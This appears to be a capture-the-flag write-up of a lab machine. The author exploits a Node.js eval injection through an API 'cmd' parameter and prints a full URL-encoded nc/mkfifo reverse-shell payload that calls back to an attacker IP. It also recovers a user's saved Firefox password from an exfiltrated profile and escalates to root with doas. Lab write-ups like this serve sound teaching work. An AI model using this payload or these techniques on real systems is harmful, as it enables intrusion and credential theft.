Target IP: 10.10.255.64
Challenge showcasing a web app and simple privilege escalation. Can you find the glitch?
There is only one TCP port open on the target machine: HTTP on port 80.
Port 80: HTTP
The webpage above is displayed for this web application.
The source-code of this webpage contains the juicy information above. JavaScript is embedded directly on the webpage and there is a function called getAccess(). This function makes a call to /api/access and it prints the response to the console.
I executed the getAccess() function at the console and received the token dGhpc19pc19ub3RfcmVhbA==, as shown above.
Decoding the token outputs the string this_is_not_real.
Doing a directory search shows an interesting entry called /secret.
The /secret webpage is empty. However, I noticed I can change the cookie value. Maybe I can change it to this_is_not_real?
After changing the value to this_is_not_real and refreshing the page, the content of the webpage changed to the one shown above.
The default webpage of the application at port 80 also changed to the one shown above.
Doing a fuzz on the API shows there is another API called items.
The contents of /api/items are shown above.
Changing the GET to POST method makes the server return there_is_a_glitch_in_the_matrix message, as shown above.
And I found cmd parameter works as the server returns the error message above. Now I can escalate this to a reverse shell connection as I know the target machine is running NodeJS and the input is being processed by the function eval.
Doing a Google search shows require("child_process").exec() can be used to obtain a reverse shell connection. I used the reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff with the POST method to obtain a reverse shell connection! Now I have a foothold on the target machine.
Running the command find / -perm -u=s -type f 2>/dev/null shows /usr/local/bin/doas. However, I cannot execute this binary as the user user.
I transferred the .firefox data to my machine using nc.
And using the command firefox --profile b5w4643p.default-release --allow-downgrade, I obtained the password of the user v0id by opening a firefox with the user's data.
And using the new password love_the_void, I successfully switched to this user v0id.
I escalated my privileges to root by using the doas binary I encountered before. Using the command doas -u root /bin/bash, I now have a root shell.
The user.txt flag which is located at the home directory of user user.
The root.txt flag.